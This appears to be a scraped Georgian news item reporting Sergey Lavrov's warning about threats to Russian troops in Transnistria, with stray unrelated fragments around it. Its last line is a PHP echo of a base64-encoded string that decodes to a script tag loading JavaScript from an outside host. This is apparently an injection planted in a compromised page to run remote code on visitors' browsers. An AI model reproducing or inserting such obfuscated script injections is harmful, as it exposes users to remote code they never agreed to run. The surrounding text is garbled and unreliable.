celsiusi
ავერსი შნაიდერი
რუსეთის საგარეო საქმეთა მინისტრის სერგეი ლავროვის განცხადებით, ნებისმიერი ქმედება, რომელიც დნესტრისპირეთში საფრთხეს შეუქმნის რუს სამხედროებს, მოსკოვის მიერ განხილული იქნება რუსეთზე თავდასხმად, „როგორც ეს იყო სამხრეთ ოსეთში“.
 
ამის შესახებ სერგეი ლავროვმა მოსკოვში სტუდენტების წინაშე სიტყვით გამოსვლისას განაცხადა.
 
„რაც შეეხება ჩვენს ინტერესებს, იქ იმყოფებიან ჩვენი მშვიდობისმყოფელები, იქ იმყოფება ჩვენი სამხედროების ჯგუფი, რომელიც ევროპაში საბრძოლო მასალების უმსხვილეს საწყობს იცავს. და ყველას უნდა ესმოდეს, რომ ნებისმიერი ქმედება, რომელიც საფრთხეს შეუქმნის ჩვენი სამხედროების უსაფრთხოებას, საერთაშორისო სამართლის შესაბამისად განხილული იქნება როგორც რუსეთის ფედერაციაზე თავდასხმა, როგორც ეს იყო სამხრეთ ოსეთში, როდესაც ჩვენს მშვიდობისმყოფელებს თავს დაესხა სააკაშვილი“, – განაცხადა ლავროვმა.
580
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");